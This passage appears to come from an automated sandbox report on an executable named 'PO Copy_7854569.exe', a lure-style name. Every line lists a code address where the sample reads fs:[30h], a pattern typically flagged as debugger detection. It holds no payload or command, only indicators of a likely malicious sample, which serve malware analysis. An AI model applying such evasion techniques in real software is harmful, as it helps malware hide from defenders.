            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016BC460 mov ecx, dword ptr fs:[00000030h]6_2_016BC460
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165A470 mov eax, dword ptr fs:[00000030h]6_2_0165A470
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165A470 mov eax, dword ptr fs:[00000030h]6_2_0165A470
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165A470 mov eax, dword ptr fs:[00000030h]6_2_0165A470
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166E443 mov eax, dword ptr fs:[00000030h]6_2_0166E443
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166E443 mov eax, dword ptr fs:[00000030h]6_2_0166E443
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166E443 mov eax, dword ptr fs:[00000030h]6_2_0166E443
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166E443 mov eax, dword ptr fs:[00000030h]6_2_0166E443
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166E443 mov eax, dword ptr fs:[00000030h]6_2_0166E443
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166E443 mov eax, dword ptr fs:[00000030h]6_2_0166E443
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166E443 mov eax, dword ptr fs:[00000030h]6_2_0166E443
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166E443 mov eax, dword ptr fs:[00000030h]6_2_0166E443
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016EA456 mov eax, dword ptr fs:[00000030h]6_2_016EA456
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0162645D mov eax, dword ptr fs:[00000030h]6_2_0162645D
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165245A mov eax, dword ptr fs:[00000030h]6_2_0165245A
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0162E420 mov eax, dword ptr fs:[00000030h]6_2_0162E420
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0162E420 mov eax, dword ptr fs:[00000030h]6_2_0162E420
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0162E420 mov eax, dword ptr fs:[00000030h]6_2_0162E420
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0162C427 mov eax, dword ptr fs:[00000030h]6_2_0162C427
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B6420 mov eax, dword ptr fs:[00000030h]6_2_016B6420
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B6420 mov eax, dword ptr fs:[00000030h]6_2_016B6420
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B6420 mov eax, dword ptr fs:[00000030h]6_2_016B6420
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B6420 mov eax, dword ptr fs:[00000030h]6_2_016B6420
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B6420 mov eax, dword ptr fs:[00000030h]6_2_016B6420
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B6420 mov eax, dword ptr fs:[00000030h]6_2_016B6420
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B6420 mov eax, dword ptr fs:[00000030h]6_2_016B6420
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166A430 mov eax, dword ptr fs:[00000030h]6_2_0166A430
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01668402 mov eax, dword ptr fs:[00000030h]6_2_01668402
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01668402 mov eax, dword ptr fs:[00000030h]6_2_01668402
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01668402 mov eax, dword ptr fs:[00000030h]6_2_01668402
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016304E5 mov ecx, dword ptr fs:[00000030h]6_2_016304E5
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016364AB mov eax, dword ptr fs:[00000030h]6_2_016364AB
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016644B0 mov ecx, dword ptr fs:[00000030h]6_2_016644B0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016BA4B0 mov eax, dword ptr fs:[00000030h]6_2_016BA4B0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016EA49A mov eax, dword ptr fs:[00000030h]6_2_016EA49A
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01638770 mov eax, dword ptr fs:[00000030h]6_2_01638770
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640770 mov eax, dword ptr fs:[00000030h]6_2_01640770
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640770 mov eax, dword ptr fs:[00000030h]6_2_01640770
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640770 mov eax, dword ptr fs:[00000030h]6_2_01640770
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640770 mov eax, dword ptr fs:[00000030h]6_2_01640770
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640770 mov eax, dword ptr fs:[00000030h]6_2_01640770
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640770 mov eax, dword ptr fs:[00000030h]6_2_01640770
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640770 mov eax, dword ptr fs:[00000030h]6_2_01640770
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640770 mov eax, dword ptr fs:[00000030h]6_2_01640770
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640770 mov eax, dword ptr fs:[00000030h]6_2_01640770
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640770 mov eax, dword ptr fs:[00000030h]6_2_01640770
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640770 mov eax, dword ptr fs:[00000030h]6_2_01640770
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640770 mov eax, dword ptr fs:[00000030h]6_2_01640770
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166674D mov esi, dword ptr fs:[00000030h]6_2_0166674D
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166674D mov eax, dword ptr fs:[00000030h]6_2_0166674D
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166674D mov eax, dword ptr fs:[00000030h]6_2_0166674D
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01630750 mov eax, dword ptr fs:[00000030h]6_2_01630750
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016BE75D mov eax, dword ptr fs:[00000030h]6_2_016BE75D
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672750 mov eax, dword ptr fs:[00000030h]6_2_01672750
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672750 mov eax, dword ptr fs:[00000030h]6_2_01672750
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B4755 mov eax, dword ptr fs:[00000030h]6_2_016B4755
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166C720 mov eax, dword ptr fs:[00000030h]6_2_0166C720
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166C720 mov eax, dword ptr fs:[00000030h]6_2_0166C720
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166273C mov eax, dword ptr fs:[00000030h]6_2_0166273C
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166273C mov ecx, dword ptr fs:[00000030h]6_2_0166273C
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166273C mov eax, dword ptr fs:[00000030h]6_2_0166273C
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016AC730 mov eax, dword ptr fs:[00000030h]6_2_016AC730
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166C700 mov eax, dword ptr fs:[00000030h]6_2_0166C700
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01630710 mov eax, dword ptr fs:[00000030h]6_2_01630710
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01660710 mov eax, dword ptr fs:[00000030h]6_2_01660710
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016527ED mov eax, dword ptr fs:[00000030h]6_2_016527ED
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016527ED mov eax, dword ptr fs:[00000030h]6_2_016527ED
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016527ED mov eax, dword ptr fs:[00000030h]6_2_016527ED
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016BE7E1 mov eax, dword ptr fs:[00000030h]6_2_016BE7E1
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016347FB mov eax, dword ptr fs:[00000030h]6_2_016347FB
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016347FB mov eax, dword ptr fs:[00000030h]6_2_016347FB
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0163C7C0 mov eax, dword ptr fs:[00000030h]6_2_0163C7C0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B07C3 mov eax, dword ptr fs:[00000030h]6_2_016B07C3
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016307AF mov eax, dword ptr fs:[00000030h]6_2_016307AF
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016E47A0 mov eax, dword ptr fs:[00000030h]6_2_016E47A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016D678E mov eax, dword ptr fs:[00000030h]6_2_016D678E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016F866E mov eax, dword ptr fs:[00000030h]6_2_016F866E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016F866E mov eax, dword ptr fs:[00000030h]6_2_016F866E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166A660 mov eax, dword ptr fs:[00000030h]6_2_0166A660
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166A660 mov eax, dword ptr fs:[00000030h]6_2_0166A660
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01662674 mov eax, dword ptr fs:[00000030h]6_2_01662674
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0164C640 mov eax, dword ptr fs:[00000030h]6_2_0164C640
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0164E627 mov eax, dword ptr fs:[00000030h]6_2_0164E627
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01666620 mov eax, dword ptr fs:[00000030h]6_2_01666620
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01668620 mov eax, dword ptr fs:[00000030h]6_2_01668620
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0163262C mov eax, dword ptr fs:[00000030h]6_2_0163262C
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016AE609 mov eax, dword ptr fs:[00000030h]6_2_016AE609
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0164260B mov eax, dword ptr fs:[00000030h]6_2_0164260B
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0164260B mov eax, dword ptr fs:[00000030h]6_2_0164260B
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0164260B mov eax, dword ptr fs:[00000030h]6_2_0164260B
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0164260B mov eax, dword ptr fs:[00000030h]6_2_0164260B
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0164260B mov eax, dword ptr fs:[00000030h]6_2_0164260B
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0164260B mov eax, dword ptr fs:[00000030h]6_2_0164260B
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0164260B mov eax, dword ptr fs:[00000030h]6_2_0164260B
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01672619 mov eax, dword ptr fs:[00000030h]6_2_01672619
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016AE6F2 mov eax, dword ptr fs:[00000030h]6_2_016AE6F2
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016AE6F2 mov eax, dword ptr fs:[00000030h]6_2_016AE6F2
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016AE6F2 mov eax, dword ptr fs:[00000030h]6_2_016AE6F2
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016AE6F2 mov eax, dword ptr fs:[00000030h]6_2_016AE6F2
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B06F1 mov eax, dword ptr fs:[00000030h]6_2_016B06F1
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B06F1 mov eax, dword ptr fs:[00000030h]6_2_016B06F1
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166A6C7 mov ebx, dword ptr fs:[00000030h]6_2_0166A6C7
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166A6C7 mov eax, dword ptr fs:[00000030h]6_2_0166A6C7
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166C6A6 mov eax, dword ptr fs:[00000030h]6_2_0166C6A6
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016666B0 mov eax, dword ptr fs:[00000030h]6_2_016666B0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01634690 mov eax, dword ptr fs:[00000030h]6_2_01634690
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01634690 mov eax, dword ptr fs:[00000030h]6_2_01634690
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01656962 mov eax, dword ptr fs:[00000030h]6_2_01656962
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01656962 mov eax, dword ptr fs:[00000030h]6_2_01656962
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01656962 mov eax, dword ptr fs:[00000030h]6_2_01656962
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0167096E mov eax, dword ptr fs:[00000030h]6_2_0167096E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0167096E mov edx, dword ptr fs:[00000030h]6_2_0167096E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0167096E mov eax, dword ptr fs:[00000030h]6_2_0167096E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016D4978 mov eax, dword ptr fs:[00000030h]6_2_016D4978
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016D4978 mov eax, dword ptr fs:[00000030h]6_2_016D4978
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016BC97C mov eax, dword ptr fs:[00000030h]6_2_016BC97C
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B0946 mov eax, dword ptr fs:[00000030h]6_2_016B0946
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01704940 mov eax, dword ptr fs:[00000030h]6_2_01704940
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B892A mov eax, dword ptr fs:[00000030h]6_2_016B892A
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016C892B mov eax, dword ptr fs:[00000030h]6_2_016C892B
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016AE908 mov eax, dword ptr fs:[00000030h]6_2_016AE908
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016AE908 mov eax, dword ptr fs:[00000030h]6_2_016AE908
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016BC912 mov eax, dword ptr fs:[00000030h]6_2_016BC912
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01628918 mov eax, dword ptr fs:[00000030h]6_2_01628918
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01628918 mov eax, dword ptr fs:[00000030h]6_2_01628918
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016BE9E0 mov eax, dword ptr fs:[00000030h]6_2_016BE9E0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016629F9 mov eax, dword ptr fs:[00000030h]6_2_016629F9
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016629F9 mov eax, dword ptr fs:[00000030h]6_2_016629F9
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016C69C0 mov eax, dword ptr fs:[00000030h]6_2_016C69C0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0163A9D0 mov eax, dword ptr fs:[00000030h]6_2_0163A9D0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0163A9D0 mov eax, dword ptr fs:[00000030h]6_2_0163A9D0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0163A9D0 mov eax, dword ptr fs:[00000030h]6_2_0163A9D0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0163A9D0 mov eax, dword ptr fs:[00000030h]6_2_0163A9D0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0163A9D0 mov eax, dword ptr fs:[00000030h]6_2_0163A9D0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0163A9D0 mov eax, dword ptr fs:[00000030h]6_2_0163A9D0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016649D0 mov eax, dword ptr fs:[00000030h]6_2_016649D0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016FA9D3 mov eax, dword ptr fs:[00000030h]6_2_016FA9D3
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016429A0 mov eax, dword ptr fs:[00000030h]6_2_016429A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016429A0 mov eax, dword ptr fs:[00000030h]6_2_016429A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016429A0 mov eax, dword ptr fs:[00000030h]6_2_016429A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016429A0 mov eax, dword ptr fs:[00000030h]6_2_016429A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016429A0 mov eax, dword ptr fs:[00000030h]6_2_016429A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016429A0 mov eax, dword ptr fs:[00000030h]6_2_016429A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016429A0 mov eax, dword ptr fs:[00000030h]6_2_016429A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016429A0 mov eax, dword ptr fs:[00000030h]6_2_016429A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016429A0 mov eax, dword ptr fs:[00000030h]6_2_016429A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016429A0 mov eax, dword ptr fs:[00000030h]6_2_016429A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016429A0 mov eax, dword ptr fs:[00000030h]6_2_016429A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016429A0 mov eax, dword ptr fs:[00000030h]6_2_016429A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016429A0 mov eax, dword ptr fs:[00000030h]6_2_016429A0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016309AD mov eax, dword ptr fs:[00000030h]6_2_016309AD
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016309AD mov eax, dword ptr fs:[00000030h]6_2_016309AD
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B89B3 mov esi, dword ptr fs:[00000030h]6_2_016B89B3
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B89B3 mov eax, dword ptr fs:[00000030h]6_2_016B89B3
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B89B3 mov eax, dword ptr fs:[00000030h]6_2_016B89B3
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016BE872 mov eax, dword ptr fs:[00000030h]6_2_016BE872
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016BE872 mov eax, dword ptr fs:[00000030h]6_2_016BE872
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016C6870 mov eax, dword ptr fs:[00000030h]6_2_016C6870
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016C6870 mov eax, dword ptr fs:[00000030h]6_2_016C6870
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01642840 mov ecx, dword ptr fs:[00000030h]6_2_01642840
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01660854 mov eax, dword ptr fs:[00000030h]6_2_01660854
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01634859 mov eax, dword ptr fs:[00000030h]6_2_01634859
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01634859 mov eax, dword ptr fs:[00000030h]6_2_01634859
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01652835 mov eax, dword ptr fs:[00000030h]6_2_01652835
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01652835 mov eax, dword ptr fs:[00000030h]6_2_01652835
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01652835 mov eax, dword ptr fs:[00000030h]6_2_01652835
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01652835 mov ecx, dword ptr fs:[00000030h]6_2_01652835
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01652835 mov eax, dword ptr fs:[00000030h]6_2_01652835
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01652835 mov eax, dword ptr fs:[00000030h]6_2_01652835
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166A830 mov eax, dword ptr fs:[00000030h]6_2_0166A830
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016D483A mov eax, dword ptr fs:[00000030h]6_2_016D483A
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016D483A mov eax, dword ptr fs:[00000030h]6_2_016D483A
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016BC810 mov eax, dword ptr fs:[00000030h]6_2_016BC810
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016FA8E4 mov eax, dword ptr fs:[00000030h]6_2_016FA8E4
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166C8F9 mov eax, dword ptr fs:[00000030h]6_2_0166C8F9
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166C8F9 mov eax, dword ptr fs:[00000030h]6_2_0166C8F9
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165E8C0 mov eax, dword ptr fs:[00000030h]6_2_0165E8C0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_017008C0 mov eax, dword ptr fs:[00000030h]6_2_017008C0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01630887 mov eax, dword ptr fs:[00000030h]6_2_01630887
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016BC89D mov eax, dword ptr fs:[00000030h]6_2_016BC89D
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0162CB7E mov eax, dword ptr fs:[00000030h]6_2_0162CB7E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016E4B4B mov eax, dword ptr fs:[00000030h]6_2_016E4B4B
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016E4B4B mov eax, dword ptr fs:[00000030h]6_2_016E4B4B
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01702B57 mov eax, dword ptr fs:[00000030h]6_2_01702B57
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01702B57 mov eax, dword ptr fs:[00000030h]6_2_01702B57
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01702B57 mov eax, dword ptr fs:[00000030h]6_2_01702B57
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01702B57 mov eax, dword ptr fs:[00000030h]6_2_01702B57
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016C6B40 mov eax, dword ptr fs:[00000030h]6_2_016C6B40
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016C6B40 mov eax, dword ptr fs:[00000030h]6_2_016C6B40
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016FAB40 mov eax, dword ptr fs:[00000030h]6_2_016FAB40
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016D8B42 mov eax, dword ptr fs:[00000030h]6_2_016D8B42
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01628B50 mov eax, dword ptr fs:[00000030h]6_2_01628B50
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016DEB50 mov eax, dword ptr fs:[00000030h]6_2_016DEB50
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165EB20 mov eax, dword ptr fs:[00000030h]6_2_0165EB20
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165EB20 mov eax, dword ptr fs:[00000030h]6_2_0165EB20
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016F8B28 mov eax, dword ptr fs:[00000030h]6_2_016F8B28
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016F8B28 mov eax, dword ptr fs:[00000030h]6_2_016F8B28
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01704B00 mov eax, dword ptr fs:[00000030h]6_2_01704B00
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016AEB1D mov eax, dword ptr fs:[00000030h]6_2_016AEB1D
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016AEB1D mov eax, dword ptr fs:[00000030h]6_2_016AEB1D
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016AEB1D mov eax, dword ptr fs:[00000030h]6_2_016AEB1D
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016AEB1D mov eax, dword ptr fs:[00000030h]6_2_016AEB1D
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016AEB1D mov eax, dword ptr fs:[00000030h]6_2_016AEB1D
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016AEB1D mov eax, dword ptr fs:[00000030h]6_2_016AEB1D
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016AEB1D mov eax, dword ptr fs:[00000030h]6_2_016AEB1D
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016AEB1D mov eax, dword ptr fs:[00000030h]6_2_016AEB1D
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016AEB1D mov eax, dword ptr fs:[00000030h]6_2_016AEB1D
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01638BF0 mov eax, dword ptr fs:[00000030h]6_2_01638BF0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01638BF0 mov eax, dword ptr fs:[00000030h]6_2_01638BF0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01638BF0 mov eax, dword ptr fs:[00000030h]6_2_01638BF0
